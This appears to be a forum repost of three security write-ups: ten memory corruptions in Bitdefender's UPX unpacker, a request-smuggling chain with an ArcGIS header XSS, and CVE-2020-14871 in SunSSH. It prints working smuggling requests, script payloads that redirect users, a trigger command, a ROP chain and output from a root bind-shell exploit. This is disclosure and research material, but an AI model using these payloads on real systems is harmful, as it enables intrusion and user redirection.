check for(int32_t k=0; k<xor_len; k++) { packer->extracted_data[k] ^= xor_key; // <-- oob write } *info_string = "encrypted"; } } The bound check is completely wrong. It should check against the size of the extracted data buffer. Instead, it checks against a value that is previously set to the raw data size of the section we extracted the data from. Those two sizes have nothing to do with each other. In particular, one can be much smaller than the other, or vice-versa. As the function does not return after the first deobfuscation run, the memory corruption can be triggered up to 0x300 times in a row. This allows us to bypass the limitation that in a single deobfuscation run we always XOR with the same byte. We would simply XOR as follows: First run (i=0): XOR with B0 B0 B0 B0 B0 B0 B0 Second run (i=1): XOR with B1 B1 B1 B1 B1 Third run (i=2): XOR with B2 B2 Overall, we then have XORed with C0 C0 C1 C1 C1 C2 C2 for completely arbitrary C0, C1, and C2. We can essentially XOR with such a pattern of almost arbitrary length, and switch the byte at most 0x300 times. Needless to say, this vulnerability is a useful exploitation primitive as it enables very powerful memory corruptions: XORing allows us to modify selectively only certain parts of data, leaving other parts (for example heap metadata or critical objects) untouched. //4//: Heap Buffer Overflow in the Filters A filter is a simple transformation on binary code (say, x86-64 code) that is applied before compression, with the goal to make the code more compressible. After we have decompressed the data, we need to revert this filtering. Bitdefender supports about 15 different filters. Here is one of them (filter 0x11): int32_t bytes_to_filter = /* omitted. is guaranteed not to be oob.
*/; int i = 0; while (1) { do { if (--bytes_to_filter < 0) break; } while (extracted_data[i++] != 0xE8u); if (bytes_to_filter < 0) break; *(int32_t *)&extracted_data[i] -= i; // <-- oob write i += 4; } The problem is that bytes_to_filter is only updated when i is incremented by one, but not when it is later incremented by four. Of the 15 filters, about 8 seem to be affected by such a heap buffer overflow. I treated them all together as one bug (after all, it is not unlikely that they share code). //5//: Heap Buffer Overflow when Rebuilding Imports The following memory corruption occurs in a loop of the function PeFile::rebuildImports (cf. PeFile::rebuildImports). It looks like this: this->im->iat = this->iatoffs; this->newiat = &extract_obj->extracted_data[this->iatoffs - (uint64_t)(uint32_t)pefile->rvamin]; while (*p) { if (*p == 1) { ilen = strlen(++p) + 1; if (this->inamespos) { if (ptr_diff(this->importednames,this->importednames_start) & 1) --this->importednames; memcpy(this->importednames + 2, p, ilen); // <-- memory corruption *this->newiat = ptr_diff(this->importednames,extract_obj->extracted_data - pefile->rvamin); this->importednames += ilen + 2; p += ilen; } else { //omitted, see below //5// } } else if (*p == 0xFFu) { p += 3; *this->newiat = ord_mask + *(uint16_t *)(p + 1); } else { // omitted } ++this->newiat; } The length ilen that is passed to memcpy is completely attacker-controlled and thus needs to be checked. Observe that the original UPX does a checked omemcpy at this place. //6//: Another Heap Buffer Overflow when Rebuilding Imports In the same loop of the function PeFile::rebuildImports (cf. PeFile::rebuildImports), there is another memory corruption: this->im->iat = this->iatoffs; this->newiat = &extract_obj->extracted_data[this->iatoffs - (uint64_t)(uint32_t)pefile->rvamin]; while (*p) { if (*p == 1) { ilen = strlen(++p) + 1; if (this->inamespos) { //omitted, see above //5// } else { extracted_data = extract_obj->extracted_data; dst_ptr = (extracted_data - pefile->rvamin) + (*this->newiat + 2); if (dst_ptr < extracted_data) return 0; extracted_data_end = &extracted_data[extract_obj->extractbuffer_bytes_written]; if (dst_ptr > extracted_data_end || &dst_ptr[ilen + 1] > extracted_data_end) return 0; strcpy(dst_ptr,p); // <-- memory corruption p += ilen; } } else if (*p == 0xFFu) { p += 3; *this->newiat = ord_mask + *(uint16_t *)(p + 1); } else { // omitted } ++this->newiat; } The problem is that the strings dst_ptr and p can overlap, so we overwrite the string that we called strlen() on earlier. This can turn a terminating null-byte into a non-null byte and when strcpy() is called, the string is longer than expected, overflowing the buffer. A possible fix is to replace the strcpy(dst_ptr,p) with memmove(dst_ptr,p,ilen). It looks like original UPX is affected as well. The two commits 14992260 and 1faaba8f are an attempt to fix the problem in the devel branch of UPX. //7//: Heap Buffer Overflow when Unoptimizing the Relocation Table Another memory corruption is in the function Packer::unoptimizeReloc (cf. 
Packer::unoptimizeReloc): for (uint8_t * p = *in; *p; p++, relocn++) { if (*p >= 0xF0u) { if (*p == 0xF0u && !*(uint16_t *)(p + 1)) { p += 4; } p += 2; } } uint32_t * outp = (uint32_t *)malloc(4*relocn + 4); if (!outp) return -1; uint32_t * relocs = outp; int32_t jc = -4; for (uint8_t * p = *in; *p; p++) { if (*p >= 0xF0u) { uint32_t dif = *(uint16_t *)(p + 1) + ((*p & 0xF) * 0x10000); p += 2; if (dif == 0) { dif = *(int32_t *)(p + 1); p += 4; } jc += dif; } else { jc += *p; } *relocs = jc; // <-- oob write ++relocs; if (!packer->extracted_data) return -1; if (bits == 32) { if (jc > packer->extractbuffer_bytes_written - 4) return -1; uint32_t tmp = *(uint32_t*)&extracted_data[jc]; packer->extracted_data[jc + 0] = (uint8_t)(tmp >> 24); packer->extracted_data[jc + 1] = (uint8_t)(tmp >> 16); packer->extracted_data[jc + 2] = (uint8_t)(tmp >> 8); packer->extracted_data[jc + 3] = (uint8_t)tmp; } else { // omitted } } Ignoring the if-branch if (bits == 32), this looks fine. The very first loop runs through the table until a null byte is encountered and relocn counts how many entries there are. Then, a buffer of size 4 * relocn + 4 is allocated, and we run through the table a second time. The problem is that in the branch if (bits == 32), the endianness of a 4-byte value is swapped, and since the offset jc can point to the position where the null byte was, this can turn a null byte into a non-null byte. If that happens, it is easy to see that in the second loop, the variable p is increased further than in the first loop, and thus the allocated buffer is too small. The write *relocs = jc is then eventually out of bounds. It looks like the original UPX is affected as well. Commit e03310fc is an attempt to fix the bug in the devel branch of UPX. //8//: Heap Buffer Overflow when Finishing Building the Relocation Table The next memory corruption is to be found in the function PeFile::reloc::finish (cf. PeFile::reloc::finish): *(uint32_t *)&start[4 * counts[0] + 1024] = this->endmarker; qsort(start + 1024, ++counts[0], 4i64, le32_compare); rel = (reloc *)start; rel1 = (uint16_t *)start; for (ic = 0 ; ic < counts[0]; ++ic) { unsigned pos = *(int32_t *)&start[4 * ic + 1024]; if ((pos ^ this->prev) >= 0x10000) { rel1 = rel1; this->prev = pos; *rel1 = 0; rel->size = ALIGN_UP(ptr_diff(rel1,rel), 4); //rel1 increased by up to 3 bytes next_rel = (reloc *)((char *)rel + rel->size); rel = next_rel; rel1 = (uint16_t *)&next_rel[1];// rel1 increased by sizeof(reloc)==8 bytes next_rel->pagestart = (pos >> 4) & ~0xFFF; } *rel1 = ((int16_t)pos << 12) + ((pos >> 4) & 0xFFF); // <-- oob write ++rel1; } It seems that without the inner if-branch, the bound check ic < counts[0] would be fine, since it is then guaranteed that rel1 is before the position that the index 4*ic+1024 represents. However, if we go into the if-branch, rel1 is increased faster than one would expect. On top of the 2-byte increase at the end of every loop iteration, the if-branch may increase rel1 by 3 bytes (due to the ALIGN_UP(_,4)) and by another sizeof(reloc) == 8 bytes. It seems like the original UPX is affected as well. Looking at the original code, we see that rel and rel1 are advanced in a call to the function PeFile::reloc::newRelocPos which was inlined in the above (decompiled) code snippet. Interestingly, it is this inlining that makes the bug easy to spot. The UPX developers have been notified about this on September 20, but no patch is available yet.
//9//: Heap Buffer Overflow when Building the Export Table It looks like the engine is not really fully reconstructing the export table, but only doing some basic virtual address adjustments (compare to the original PeFile::Export::build): uint32_t num_entries = export_dir_buffer[6]; // attacker-controlled uint32_t va_dif = export_dir_virtualaddress - outer_export_dir_virtualaddress; uint32_t table_base_offset = export_dir_buffer[8] - outer_export_dir_virtualaddress; export_dir_buffer[3] += va_dif; export_dir_buffer[7] += va_dif; export_dir_buffer[8] += va_dif; export_dir_buffer[9] += va_dif; for(uint32_t i=0; i<num_entries; i++) { if ((table_base_offset + 4*i > export_dir_buffer_size) || (table_base_offset + 4*i < export_dir_buffer_size)) // <-- what? goto LABEL_ERROR; *(uint32_t*)((uint8_t*)export_dir_buffer + table_base_offset + 4*i) += va_dif; // <-- oob write } The bound check on table_base_offset + 4*i looks very suspicious. It is probably a typing error. Even ignoring memory safety, it is unlikely that this comes close to implementing the desired functionality: the loop can execute at most one iteration, and in this one iteration we have table_base_offset + 4*i == export_dir_buffer_size, which is guaranteed to cause a memory corruption (an attacker-controlled 4-byte integer is written out of bound). The fixed check looks as follows. if ((table_base_offset + 4*i >= export_dir_buffer_size) || (table_base_offset + 4*i + 3 >= export_dir_buffer_size)) goto LABEL_ERROR; It is likely that this bug was introduced due to the original check being added via a bound checking macro of UPX in a wrong way. //10//: Heap Buffer Overflow when Rebuilding Resources Finally, there is a memory corruption at the very end of PeFile::rebuildResource (cf. PeFile::rebuildResource), where the constructed resources are written back: if (!*(int32_t *)(&extracted_data[*((int32_t *)pefile->extracted_ntheader + 34) - pefile->rvamin + 12])) { result = memcpy(&extracted_data[*((uint32_t*)pefile->extracted_ntheader + 34) - (uint64_t)(uint32_t)pefile->rvamin], p, res.dirsize()); } There is no bound check on res.dirsize(). Note that the original UPX-code has a checked omemcpy. Conclusion Virtually all main steps of Bitdefender’s UPX unpacker were affected by a critical memory corruption vulnerability. Interestingly, the actual decompression is perhaps the only step that seems to be unaffected. This is because the engine is extracting into a dynamically-sized buffer (similar to an std::vector) via an API that does not even allow memory corruptions (the only operations used are append_byte(b) and append_bytes(buf,len)). In almost half of the presented cases, the critical bound check was simply missing. In most of the other cases, the bound check was obviously wrong. Perhaps the only memory corruptions that are not completely obvious are //6// and //7//, as they are caused by unexpected overlaps. It seems that //6//, //7//, and //8// have been inherited from the original UPX code. The UPX developers have been notified about this and are in the process of fixing the bugs. Since the original UPX is clearly not made to unpack untrusted binaries (such as malware) and does not run at a high level of privileges, these bugs are not that critical there. However, in the context of an anti-virus engine these bugs become dangerous vulnerabilities. Bitdefender’s engine is running unsandboxed as NT AUTHORITY\SYSTEM and is scanning untrusted files fully automatically, making it an attractive target for remote code execution exploits.
An actual exploit would have to bypass ASLR and DEP (and possibly the stack canary). The previous exploit on F-Secure Anti-Virus shows that this is not that difficult, even in a non-scriptable environment. The outlined vulnerabilities are part of Bitdefender’s core engine that is not only used by many of their own anti-virus products on various operating systems (macOS, Linux, FreeBSD, Windows), but is also licensed to numerous other anti-virus vendors. Vulnerabilities in the core engine are therefore immediately affecting numerous users and devices. Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my e-mail address on the about page. Timeline of Disclosure The following timeline looks somewhat scrambled, because the bugs were not discovered in the natural control-flow order that is used for the presentation in this blog post. 2020-07-03 - Discovery of //5// 2020-07-08 - //5// has been patched (the Bitdefender team found the bug before I could report it) 2020-07-15 - Discovery and report of //7// 2020-07-16 - Discovery and report of //9// 2020-07-20 - Bitdefender rolls out patches for //7// and //9// 2020-07-28 - Bitdefender reserved CVE-2020-15729 for //7// 2020-08-09 - Discovery and report of //4// 2020-08-09 - Discovery and report of //6// 2020-08-09 - Discovery and report of //8// 2020-08-12 - Bitdefender has rolled out patches for //4//, //6//, and //8// 2020-08-14 - Bitdefender communicates that they are “planning to stop allocating CVEs automatically for each and every single vuln[erability]” (emphasis in original). 2020-08-15 - Discovery and report of //3// 2020-08-16 - Discovery and report of //1// 2020-08-17 - Bitdefender rolls out patches for //1// and //3// 2020-08-30 - Discovery and report of //10// 2020-09-02 - Bitdefender rolls out patch for //10// 2020-09-04 - The patch for //8// is incomplete, even the same file can be used to trigger a crash. Asking for a full patch. Response: “that particular issue will be fixed via update probably on Monday, next week”. 2020-09-07 - Bitdefender rolls out second patch for //8// 2020-09-07 - The patch for //3// is incomplete, asking for a complete patch for //3// 2020-09-08 - Bitdefender: “Can you give us more details regarding this bug [//3//]? Can you still reproduce this vulnerability?” I describe the problem again and send a new file triggering the bug (since the original one did not trigger it anymore) 2020-09-08 - The second patch for //8// is still incomplete. Submitting a new file to trigger the bug 2020-09-10 - Bitdefender rolls out second patch for //3// and third patch for //8// 2020-09-17 - Discovery and report of //2// (without a PoC file) 2020-09-20 - Reached out to UPX developers, describing //6//, //7//, and //8// 2020-09-21 - Bitdefender rolls out first patch for //2// 2020-09-30 - The third patch for //3// is still incomplete. Submitting a new file to trigger the bug 2020-09-30 - The first patch for //2// is still incomplete. Submitting a more detailed problem description 2020-09-30 - Bitdefender rolls out second patch for //2// 2020-10-05 - Bitdefender rolls out fourth patch for //3// 2020-10-31 - The second patch for //2// checks against an initialized value, but introduces an integer underflow (causing a fully attacker-controlled heap buffer overflow). Submitting a file to trigger the new bug 2020-11-02 - Bitdefender rolls out third patch for //2// Bug bounties were paid for all submissions (including follow-up submissions pointing out incomplete patches). 
Thanks & Acknowledgements I want to thank the Bitdefender team for fixing all reported bugs. In addition, I want to thank Alex Balan, Octavian Guzu, and Marius Gherghinoiu for providing me with regular status updates. Sursa: https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/
  7. Smuggling an (Un)exploitable XSS This is the story about how I’ve chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal web site users without any user interaction to arbitrary pages. This post also introduces a 0day in ArcGis Enterprise Server. However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts. Smuggling Requests for Different Response Lengths So what I usually do when having a look at a single application is trying to identify endpoints that are likely to be proxied across the infrastructure - endpoints that are commonly proxied are for example API endpoints since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I’ve found an asset exposing an API endpoint that was actually vulnerable to a CL.TE-based request smuggling by using a payload like the following: POST /redacted HTTP/1.1 Content-Type: application/json Content-Length: 132 Host: redacted.com Connection: keep-alive User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Foo: bar Transfer-Encoding: chunked 4d {"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"} 0 GET / HTTP/1.1 Host: redacted.com X: X As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint. To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times: While TurboIntruder was running, I’ve manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, of which one returned the original response of the API: And the other returned the start page: This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun. Poisoning Links Through ArcGis’ X-Forwarded-Url-Base Header To extend my attack surface for the smuggling issue, I’ve noticed that the same server was also running an instance of the ArcGis Enterprise Server under another directory. So I’ve reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability. I’ve stumbled upon an interesting constellation affecting its generic error handling: The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set. So a minified request to exploit this issue against the ArcGis’ /rest/directories route looks like the following: GET /rest/directories HTTP/1.1 Host: redacted.com X-Forwarded-Url-Base: https://www.rce.wf/cat.html? X-Forwarded-Request-Context: HackerOne This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ?
which is used to get rid of the automatically appended URL string /rest/services): While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction by having the user (victim) click on any link on the error page. However, I was actually looking for something that does not require any user interaction. A Seemingly Unexploitable ArcGis XSS You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base: X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script> X-Forwarded-Request-Context: HackerOne leads to an alert being injected into the error page: Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request. While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection. If you’d now use a payload like the following: X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script> X-Forwarded-Request-Context: HackerOne …you’d now be able to redirect users. Connecting the Dots The full exploit looked like the following: POST /redacted HTTP/1.1 Content-Type: application/json Content-Length: 278 Host: redacted.com Connection: keep-alive User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Foo: bar Transfer-Encoding: chunked 4d {"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"} 0 GET /redacted/rest/directories HTTP/1.1 Host: redacted.com X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script> X-Forwarded-Request-Context: HackerOne X: X While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server: After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network. Mission Completed. Thanks for the nice critical bounty Sursa: https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
8. Exploiting Solaris 10 - 11.0 SunSSH via libpam on x86

13.11.2020 by HackerHouse

A recently disclosed vulnerability, CVE-2020-14871, impacting Solaris-based distributions has been actively used in attacks against SunSSHD for over 6 years. The vulnerability was identified being exploited in the wild by an APT threat actor[0] and was then disclosed by FireEye after being detected during an attack. The issue is also referenced as CVE-2020-27678 by the Illumos project, which similarly contained the vulnerable code, making this issue impact a dozen additional Solaris-based distributions. This vulnerability is noteworthy as a number of separate individuals and groups identified this flaw after it was learned to have been circulated by exploit brokers since 6th October 2014. The issue first came to light during the HackingTeam breach incident, as emails showed that a private exploit broker firm, "Vulnerabilities Brokerage International", emailed the company announcing they had a SunSSHD exploit for sale for a monthly license fee. An email snippet from the breach announcing the sale is shown below, and the attached product portfolio[1] gives sufficient information that allowed Hacker House to confirm that the flaw disclosed recently is the same one sold since 2014. According to FireEye this issue was sold for $3,000 on an underground forum to the detected APT group; however, quotes for this issue may have ranged anywhere from $25,000 to $50,000 over the years prior to its disclosure.

"14-006 is a new memory corruption vulnerability in Oracle Solaris SunSSHD yielding remote privileged command execution as the root user. The provided exploit is a modified OpenSSH client making exploitation of this vulnerability very convenient."

This blog post discusses Hacker House's efforts to develop an exploit for the now publicly known flaw and how we exploited this issue against Solaris x86 targets. The vulnerability is also present on SPARC systems, with exploits existing in the wild that support both architectures. The actual flaw exists within the core "Pluggable Authentication Module" (PAM) library and can be reached remotely over SunSSH only when "keyboard-interactive" is enabled. This configuration is the default on a generic install of Solaris, requiring no configuration changes to be exploitable, making this a critical issue (CVSS 10.0) that remotely impacts the OS out of the box. Let's look at the vulnerability specifics first, by reviewing the parse_user_name() function within "pam_framework.c". The code snippet below is taken prior to the patch applied to Illumos[2] (a fork of Solaris using an open-source base which also contained the vulnerable code). I have removed comments from this snippet for brevity.
621 static int
622 parse_user_name(char *user_input, char **ret_username)
623 {
624 	register char *ptr;
625 	register int index = 0;
626 	char username[PAM_MAX_RESP_SIZE];
629 	*ret_username = NULL;
635 	bzero((void *)username, PAM_MAX_RESP_SIZE);
636
640 	ptr = user_input;
641
643 	while ((*ptr == ' ') || (*ptr == '\t'))
644 		ptr++;
645
646 	if (*ptr == '\0') {
651 		return (PAM_BUF_ERR);
652 	}
653
658 	while (*ptr != '\0') {
659 		if ((*ptr == ' ') || (*ptr == '\t'))
660 			break;
661 		else {
662 			username[index] = *ptr;
663 			index++;
664 			ptr++;
665 		}
666 	}
667
669 	if ((*ret_username = malloc(index + 1)) == NULL)
670 		return (PAM_BUF_ERR);
671 	(void) strcpy(*ret_username, username);
672 	return (PAM_SUCCESS);
673 }

The "username" buffer is a 512-byte array, defined by PAM_MAX_RESP_SIZE (from pam_appl.h), which is declared on the stack at the start of the function. This buffer is used to hold the username supplied to the parse_user_name() function when authentication via PAM is performed. The "user_input" argument supplied to this function is processed in a while loop beginning on line 658; this loop copies each byte of the user_input argument into the fixed-size username buffer on line 662, stopping only at the first whitespace, tab or NUL character it encounters. The vulnerability exists because this function does not check the bounds of the username stack array, and thus it is possible to write past the boundary of the buffer by supplying a user_input argument with a length greater than 512 bytes. This is a classic example of "stack smashing" and allows the attacker to corrupt the stack frame, overwriting important variables such as pointers used as return addresses by the currently executing function.

Now that we have learned the vulnerability specifics, we can identify ways to trigger the issue by looking for code using the parse_user_name() function. When using SunSSH with "keyboard-interactive" authentication enabled in the configuration (a standard default unless changed), SunSSH will make use of the "authtok_get" PAM module to prompt for a username and password. The PAM module will use pam_sm_authenticate() with the supplied username, which calls pam_get_user() and ultimately provides our username to the parse_user_name() function directly. The "keyboard-interactive" configuration option in SunSSH has been available since Solaris 9; however, versions of SunSSH that shipped with Solaris 9 did not actually implement "keyboard-interactive", making this issue only applicable via SunSSH to Solaris 10 and 11. Further to this, from Solaris 11.1 onwards the code base still contained the vulnerability, but usernames are now truncated before reaching the vulnerable code path, preventing the overflow from occurring via SunSSH. To trigger the PAM authentication prompts, we can simply supply a blank or empty username over SSH and then pass a username greater than 512 bytes at the prompt, causing the stack frame to be corrupted and the remote SunSSH process to core dump on the target. An example of triggering this issue using the standard OpenSSH client is shown below.
% ssh -l "" 192.168.11.120 Please enter user name: brrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr Connection closed by 192.168.11.120 port 22 We will now demonstrate how to exploit this issue on a vulnerable Solaris 10 host using latest available Solaris 10 install media[3] which does not include the fix. We added several package utilities such as “gdb” onto our host to assist with exploitation, additionally you may find that enabling “debug” for PAM modules by editing the “other” modules settings in /etc/pam.conf will help identify the issue within syslog. On a default install, core dumps are not enabled in any meaningful way and you should enable them using “coreadm” if you want to review core files. We will trigger the vulnerability by sending 512 bytes and an additional 8 bytes which will be overwritten on the stack. We used libssh2 to create our SSH connections to our target and send the characters to the username prompt which will be used in the overflow. You could also use Python’s paramiko, other SSH libraries or write a patch for the OpenSSH client to achieve the same goal. Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) i r $eip $ebp eip 0x42424242 0x42424242 ebp 0x41414141 0x41414141 As can be seen, the variables directly after the username buffer on the stack include the base pointer and instruction pointer (although slightly different on Solaris 11, the EIP is still overwritten) making this a trivial to exploit vulnerability on x86. SPARC systems require additional work to obtain control of the program counter as the crash occurs during a memory write operation. Additionally, if we supply more characters into the overflow we notice that the program will crash in an earlier function, as we corrupt the stack frame and overwrite a pointer used in a memory write operation before returning into our return address. Program received signal SIGSEGV, Segmentation fault. 0xfee91c01 in ?? () (gdb) x/i $eip => 0xfee91c01: mov %eax,(%ecx) (gdb) i r $ecx ecx 0x72727272 1920103026 Our exploit must ensure that we handle this issue by supplying an address that can be written before we return into our shellcode (16 bytes into the overflow on 10) to prevent the application crashing. We can review the process memory address space using the “info proc mappings” command in gdb, shortened here for brevity, which allows us to check the mapped addresses and their protections. 
Mapped address spaces:

	Start Addr   End Addr       Size     Offset  Flags
	 0x8041000  0x8047fff     0x7000 0xffffa000  -s--rw-
	 0x8050000  0x8098fff    0x49000          0  ----r-x
	 0x80a9000  0x80abfff     0x3000    0x49000  ----rw-
	 0x80ac000  0x80cdfff    0x22000          0  --b-rw-

On Solaris 10 x86 the stack is mapped at 0x8041000 with a size of 0x7000 bytes (0x08040000 and 0x8000 bytes on Solaris 11) without the executable flag. ASLR is not enabled for userspace applications on vulnerable versions of Solaris (it was only introduced in Solaris 11.1), which means our stack is always located at the same address and subsequently so too is our username buffer. We can pack our shellcode into the username buffer, but we must first enable the executable flag on the stack. We can use the mprotect() system call to remap the stack page as executable before we execute any code placed there. We use a technique known as return oriented programming (ROP), which builds gadgets that make use of the "ret" instruction and our supplied stack frame to programmatically execute instructions through a chain of returning functions. This technique will allow us to execute code which we will use to call the mprotect() function. We can identify which library files are mapped at which address using the "pmap" command and then use utilities such as ROPgadget[4] to search the mapped binaries for useful instructions followed by a "ret" instruction. On Solaris, the mprotect syscall number is 0x74 and the interrupt service routine used by syscalls is 0x91. Our ROP chain should then perform instructions similar to the following, which can be tested using gdb.

movl  $0x74,%eax     // mprotect syscall
pushl $0x7           // PROT_READ | PROT_WRITE | PROT_EXEC
pushl $0x7000        // size
pushl $0x08041000    // pointer to page to map
pushl $0x0           // unused
int   $0x91          // execute the system call

By searching through library files and the process binary we can build a ROP chain that calls mprotect and execute it via the "sysenter" function. We can then return into the stack, where our shellcode is stored on a now-executable page, and run arbitrary payloads. The mprotect system call on Solaris will accept length and protection variables that are somewhat incorrect provided they loosely match the needed values (the prot LSB must be 0x07 and the len MSB must be 0x08 or below); the function will return an error in such instances but the memory page's protections will still have been changed. We can check how our system call is being executed using the "truss" utility to trace the sshd process once we supply our ROP chain. We also used a helper function to remap the stack in situations where only part of the stack page could be mapped using the variables available in the process memory, although this is not essential in many cases. The mprotect function still requires the address to be page aligned, which is problematic as we must avoid NULL bytes when supplying a value such as 0x08043000 to the system call. An example ROP chain for Solaris 10 is shown here. We make use of variables already found within the program to call the mprotect() function: we write our stack address into this buffer and then enable the execution protections on the stack. The chain will then return into the stack buffer where our supplied shellcode is ready to be executed.
"\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // unused gadget, passed to prevent %ecx crashing "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe" // sysenter, (ret into shellcode via %edx) You can download an exploit for this issue from our github[5], at the time of writing we include ROP chains for multiple versions of Solaris 10 through 11.0 on x86. As an example shellcode we have used bind shell payloads generated with “msfvenom” that can be used on Solaris 10 targets, however on Solaris 11.0 the execve() system call has changed to execvex() which needs additional arguments and there are no public shellcodes that will work directly on 11.0 targets. To solve this issue, we have also included an example execve() shellcode for such systems for demonstration purposes (which may change in the future). As we continue to research this issue and its exploitability on different architectures and Operating Systems (such as SmartOS, OpenIndiana, OmniOS & other Illumos based distributions), we will likely continue to update our exploit, check our github for the latest available version. It is strongly advised that both “password” and “keyboard-interactive” methods of authentication are disabled on impacted SSH services. As this vulnerability exists in the core PAM framework, it is highly likely other exploitable scenarios exist other than via SSH services and it is strongly advised that a fix is applied as a matter of priority to any impacted hosts. Solaris systems are typically used in mission critical environments and utilizing Shodan[6], we can see that potentially 3,200 hosts on network perimeters maybe impacted by this flaw. As Solaris is frequently used within internal networks the actual number of vulnerable systems is believed to be much higher and Hacker House advises that all system owners address this issue as a matter of priority. Impacted hosts should also be reviewed to identify core files and syslog entries which may indicate the presence of a previously performed attack as the issue has known to be exploited in the wild for at least 6 years and your systems may already have been compromised. An example of our exploit being used in a successful attack can be seen here. $ ./hfsunsshdx -s 192.168.11.120 -t 2 -x 1 [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 [-] chosen target 'Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86' [-] using shellcode 'Solaris x86 bindshell tcp port 8080' 196 bytes [+] ssh host fingerprint: e4e0f371515d0d0be6767b0c628e1b8891f18d1f [+] entering keyboard-interactive authentication. [-] number of prompts: 1 [-] prompt 0 from server: 'Please enter user name: ' [-] shellcode length 196 bytes [-] rop chain length 64 [-] exploit buffer length 576 [-] sending exploit magic buffer... wait [+] exploit success, handling payload... [-] connected.. 
enjoy
SunOS unknown 5.10 Generic_147148-26 i86pc i386 i86pc
